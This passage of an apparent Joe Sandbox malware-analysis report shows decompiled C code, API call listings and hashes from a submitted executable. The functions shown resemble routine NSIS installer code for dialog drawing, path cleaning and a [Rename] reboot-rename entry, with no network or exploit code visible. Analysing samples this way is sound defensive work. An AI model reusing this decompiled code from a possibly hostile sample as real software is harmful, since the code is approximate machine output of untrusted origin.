							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x4281a0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E0040462D(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a208, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a208, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x4216b4 != 0) {
						goto L27;
					} else {
						_t69 =  *0x4226c0; // 0x532ebc
						_t29 = _t69 + 0x14; // 0x532ed0
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404203(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404609();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x4291dc - 4 + _t75 * 4);
				}
				_t76 =  *0x42a258 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E0040432F;
				if(_t110 != 2) {
					_v8 = E004042F5;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004041E1(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004041E1(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404203( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E00404216(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a214 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x4216b4 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x4216b4 = 0;
				return 0;
			}

0x00404390
0x004044bd
0x0040451a
0x0040451e
0x004045eb
0x004045ed
0x004045ed
0x004045f3
0x004045f3
0x004045f6
0x00000000
0x004045fd
0x0040452c
0x00404532
0x0040453c
0x00404547
0x0040454a
0x0040454d
0x00404558
0x0040455b
0x00404562
0x0040456f
0x00404580
0x00404586
0x0040458e
0x0040459c
0x004045a2
0x004045a2
0x00404562
0x004045ac
0x00000000
0x004045b7
0x004045bb
0x004045cb
0x004045cb
0x004045d1
0x004045dd
0x004045dd
0x00000000
0x004045e1
0x004045ac
0x004044c8
0x00000000
0x004044da
0x004044da
0x004044df
0x004044df
0x004044e5
0x00000000
0x00000000
0x0040450e
0x00404510
0x00404515
0x00000000
0x00404515
0x004044c8
0x00404396
0x00404399
0x0040439e
0x004043af
0x004043af
0x004043b7
0x004043ba
0x004043be
0x004043c1
0x004043c5
0x004043c8
0x004043cb
0x004043ce
0x004043d5
0x004043d7
0x004043d7
0x004043e1
0x004043ee
0x004043f8
0x004043fd
0x00404400
0x00404405
0x0040441c
0x00404423
0x00404436
0x00404439
0x0040444d
0x00404454
0x00404459
0x0040445e
0x0040445e
0x0040446c
0x0040447a
0x0040448c
0x00404491
0x004044a1
0x004044a3
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040441C
GetDlgItem.USER32(?,000003E8), ref: 00404430
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040444D
GetSysColor.USER32(?), ref: 0040445E
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040446C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040447A
lstrlenW.KERNEL32(?), ref: 0040447F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040448C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044A1
GetDlgItem.USER32(?,0000040A), ref: 004044FA
SendMessageW.USER32(00000000), ref: 00404501
GetDlgItem.USER32(?,000003E8), ref: 0040452C
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040456F
LoadCursorW.USER32(00000000,00007F02), ref: 0040457D
SetCursor.USER32(00000000), ref: 00404580
LoadCursorW.USER32(00000000,00007F00), ref: 00404599
SetCursor.USER32(00000000), ref: 0040459C
SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD

Strings

Call, xrefs: 0040455B
N, xrefs: 0040451A

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a214;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429200, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a208;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405E98 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E98(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426d88 = 0x55004e;
				 *0x426d8c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x427588, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x426988, "%ls=%ls\r\n", 0x426d88, 0x427588);
						_t53 = _t52 + 0x10;
						E0040626E(_t37, 0x400, 0x427588, 0x427588,  *((intOrPtr*)( *0x42a214 + 0x128)));
						_t12 = E00405D3E(0x427588, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405DC1(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405CA3(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405CA3(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405CF9(_t24 + _t46, 0x426988, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405DF0(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405D3E(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426d88, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405e98
0x00405ea1
0x00405ea8
0x00405eb2
0x00405ec6
0x00405eee
0x00405ef9
0x00405efd
0x00405f1d
0x00405f24
0x00405f2e
0x00405f3b
0x00405f40
0x00405f45
0x00405f49
0x00405f58
0x00405f5a
0x00405f67
0x00405f6b
0x00406006
0x00000000
0x00405f81
0x00405f8e
0x00405fb2
0x00405fb6
0x00405fd5
0x00405fd9
0x00405fd9
0x00405fdb
0x00405fe4
0x00405fef
0x00405ffa
0x00406000
0x00000000
0x00406000
0x00405fb8
0x00405fbb
0x00405fc6
0x00405fc2
0x00405fc4
0x00405fc5
0x00405fc5
0x00405fcd
0x00405fcf
0x00000000
0x00405fcf
0x00405f99
0x00405f9f
0x00000000
0x00405f9f
0x00405f6b
0x00405f49
0x00405ec8
0x00405ed3
0x00405edc
0x00405ee0
0x00000000
0x00000000
0x00405ee0
0x00406011

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406033,?,?), ref: 00405ED3
GetShortPathNameW.KERNEL32(?,00426D88,00000400), ref: 00405EDC

Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5

GetShortPathNameW.KERNEL32(?,00427588,00000400), ref: 00405EF9
wsprintfA.USER32 ref: 00405F17
GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
GlobalFree.KERNEL32(00000000), ref: 00406000
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406007

Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\64Tgzu2FKh.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D64

Strings

%ls=%ls, xrefs: 00405F0D
[Rename], xrefs: 00405F81, 00405F93

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
Opcode Fuzzy Hash: e2dce14ec57fd102e1061d77b498a0ceb59b39116d7a7688ffb8e9b872a7f50f
Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD

Uniqueness

Uniqueness Score: -1.00%

Function 004064E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E004064E0(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405B94(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405B4A(L"*?|<>/\":", _t5))) == 0) {
							E00405CF9(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x004064e2
0x004064eb
0x00406502
0x00406502
0x00406509
0x00406515
0x00406515
0x00406518
0x0040651b
0x00406520
0x00406522
0x0040652b
0x0040652f
0x0040654c
0x00406554
0x00406554
0x00406559
0x0040655b
0x0040655e
0x00406563
0x00406564
0x00406568
0x00406568
0x00406569
0x00406570
0x00406572
0x00406579
0x00000000
0x00000000
0x00406581
0x00406587
0x00000000
0x00000000
0x00000000
0x00406587
0x0040658c

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\64Tgzu2FKh.exe",00403318,C:\Users\user\AppData\Local\Temp\,75333420,00403589,?,00000006,00000008,0000000A), ref: 00406543
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406552
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\64Tgzu2FKh.exe",00403318,C:\Users\user\AppData\Local\Temp\,75333420,00403589,?,00000006,00000008,0000000A), ref: 00406557
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\64Tgzu2FKh.exe",00403318,C:\Users\user\AppData\Local\Temp\,75333420,00403589,?,00000006,00000008,0000000A), ref: 0040656A

Strings

*?|<>/":, xrefs: 00406532
C:\Users\user\AppData\Local\Temp\, xrefs: 004064E1, 004064E6
"C:\Users\user\Desktop\64Tgzu2FKh.exe", xrefs: 004064E0

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\64Tgzu2FKh.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-166955196
Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404248 Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404248(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x0040425a
0x004042ee
0x00000000
0x004042ee
0x0040426b
0x0040426f
0x00000000
0x00000000
0x00404275
0x0040427e
0x00404281
0x00404281
0x00404287
0x0040428d
0x0040428d
0x00404299
0x0040429f
0x004042a6
0x004042a9
0x004042ac
0x004042ae
0x004042ae
0x004042b6
0x004042bc
0x004042bc
0x004042c6
0x004042cb
0x004042ce
0x004042d3
0x004042d6
0x004042d6
0x004042e6
0x004042e6
0x00000000

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00404265
GetSysColor.USER32(00000000), ref: 00404281
SetTextColor.GDI32(?,00000000), ref: 0040428D
SetBkMode.GDI32(?,?), ref: 00404299
GetSysColor.USER32(?), ref: 004042AC
SetBkColor.GDI32(?,?), ref: 004042BC
DeleteObject.GDI32(?), ref: 004042D6
CreateBrushIndirect.GDI32(?), ref: 004042E0

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404B7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404B7A(struct HWND__* _a4, intOrPtr _a8) {
